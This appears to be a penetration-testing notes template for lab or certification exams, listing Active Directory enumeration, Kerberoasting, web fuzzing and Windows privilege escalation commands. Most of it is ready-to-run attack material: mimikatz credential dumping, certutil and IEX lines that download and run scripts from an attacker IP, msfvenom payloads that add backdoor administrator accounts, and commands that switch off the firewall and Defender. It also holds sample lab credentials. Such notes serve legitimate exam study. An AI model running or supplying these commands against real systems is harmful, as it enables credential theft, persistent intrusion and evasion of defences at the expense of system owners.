IP:


Nmap TCP

 

Nmap UDP

 

Initial Checks:

export IP={IP}

nxc smb $IP -u '' -p '' --generate-hosts-file hosts
nxc smb $IP -u '' -p '' --generate-krb5-file krb5.conf
sudo ntpdate $IP
nxc smb $IP -u '' -p ''
nxc smb $IP -u 'guest' -p ''
nxc ldap $IP -u 'guest' -p '' -M get-desc-users
nxc ldap $IP -u '' -p '' -M get-desc-users

If any of these work, go for:

--shares

-M gpp_password

-M gpp_autologin

-M powershell_history

-M keepass_discover

-M recyclebin

-M spider_plus --share 'SHARE_NAME'

--rid-brute | grep SidTypeUser | cut -d "\\" -f 2 | cut -d " " -f 1 | grep -v \\$ > users

--users-export users

nxc ldap $IP -u <u> -p <p> --asreproast asreproast.out

nxc ldap $IP -u <u> -p <p> --kerberoasting kerberoasting.out

nxc ldap $IP -u <u> -p <p> --no-preauth-targets users --kerberoasting output.txt

Creds found:

--shares

nxc ldap <ip> -u user -p pass --bloodhound --collection All --dns-server <IP_DC>

kerbrute userenum --dc 192.168.107.162 -d sub.poseidon.yzx /opt/SecLists/Usernames/xato-net-10-million-usernames.txt

impacket-GetNPUsers sub.poseidon.yzx/ -no-pass -usersfile users -dc-ip 192.168.107.162

GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip 10.10.109.146 'oscp.exam/eric.wallows:EricLikesRunning800' -request

GetNPUsers.py -dc-ip 192.168.193.158 -dc-host zeus.corp 'zeus.corp/db_user:Password123!' -request

Initial Access

Ports Open:

80

Nikto:

 

Wappalyzer:

Source Code:

Directories Fuzzing

Cheatsheet:

===DIRECTORY FUZZING:
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt -k -t 30 --random-agent --exclude-length 6765

===DIRECTORY FUZZING:
ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v

===AUTHENTICATED FUZZING DIRECTORIES:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 -d "SESSIONID=value" "$URL"

===FUZZ Directories:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"

Also try: /opt/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
/opt/SecLists/Discovery/Web-Content/common.txt

Result:

 

Files Fuzzing (add extensions)

Cheatsheet:

===AUTHENTICATED FILE FUZZING:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-files.txt --hc 404 -d "SESSIONID=value" "$URL"


===FILE FUZZING:
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-files.txt -k -t 30 -x php,html,htm --random-agent --exclude-length 6765

Result:

 

ffuf -request ~/boxes/aoc/brute -request-proto http -w numbers

Privilege Escalation

Windows:

Penelope:
run upload_privesc_scripts
run upload_credump_scripts
run ligolo

certutil.exe -urlcache -split -f http://<Our_IP>:8080/shell.bat shell.bat

.\mimikatz.exe "log" "privilege::debug" "token::elevate" "lsadump::lsa /inject" "sekurlsa::logonpasswords" exit

IEX(IWR http://192.168.45.212/PrivescCheck.ps1 -UseBasicParsing); Invoke-PrivescCheck

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Risky -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML"

PS C:\Users\Public> . .\PowerUp.ps1; Invoke-AllChecks

winPEAS colors - REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

(Get-PSReadlineOption).HistorySavePath
Default location: C:\Users\[user]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

Unusual binaries in C:\Users\*? Transfer them to Kali and run strings on them.

Don't forget to look for windows.old

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

Add admin:

net user itzvenom Password123! /add && net localgroup administrators itzvenom /add
msfvenom -p windows/exec CMD='net localgroup administrators yoshi /add' -f exe > command.exe
msfvenom -p windows/adduser USER=itzvenom PASS='P@ssw0rd!' -f exe > adduser.exe

runas /user:itzvenom cmd
Enter the password for itzvenom:
Attempting to start cmd as user "DEV04\itzvenom" ...
net user [username] [new password]

Disable firewall/AV:

netsh advfirewall set allprofiles state off
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

Set-MpPreference -DisableRealtimeMonitoring $true;Set-MpPreference -DisableIOAVProtection $true;Set-MpPreference -DisableBehaviorMonitoring $true;Set-MpPreference -DisableBlockAtFirstSeen $true;Set-MpPreference -DisableEmailScanning $true;Set-MpPreference -DisableScriptScanning $true;Add-MpPreference -ExclusionPath "C:\Windows\Temp"

whoami; hostname; ipconfig; type C:\Users\Administrator\Desktop\proof.txt
whoami; hostname; ipconfig; type C:\Users\Administrator\Desktop\local.txt